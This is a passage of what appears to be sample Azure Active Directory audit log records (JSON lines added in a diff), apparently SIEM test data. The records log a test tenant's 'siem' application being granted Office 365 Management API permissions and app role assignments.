"Value": "257"}, {"Name": "env_cv", "Value": "##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR575"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "d6ad8dba-dd88-499e-a1e1-e649bf8eeb71"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:25:54", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "OldValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "Name": "RequiredResourceAccess"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "51e48c97-80b1-42bb-b732-8b578dfac528"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:25:54.7174137Z"}, {"Name": "env_epoch", "Value": "73AB6"}, {"Name": "env_seqNum", "Value": "43793182"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR575"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "d6ad8dba-dd88-499e-a1e1-e649bf8eeb71"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:25:54", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "51e48c97-80b1-42bb-b732-8b578dfac528"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:25:54.7823970Z"}, {"Name": "env_epoch", "Value": "73AB6"}, {"Name": "env_seqNum", "Value": "43793206"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR575"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "606ae654-e71e-4a6b-a07c-85acd775667b"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9242333Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795815"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "14f7e7eb-0fd1-4f89-bda8-642d035f3541"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9992570Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795878"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "41c7d7a7-ce53-4696-aa78-37c451a95fe1"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9242333Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795815"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "14f7e7eb-0fd1-4f89-bda8-642d035f3541"}
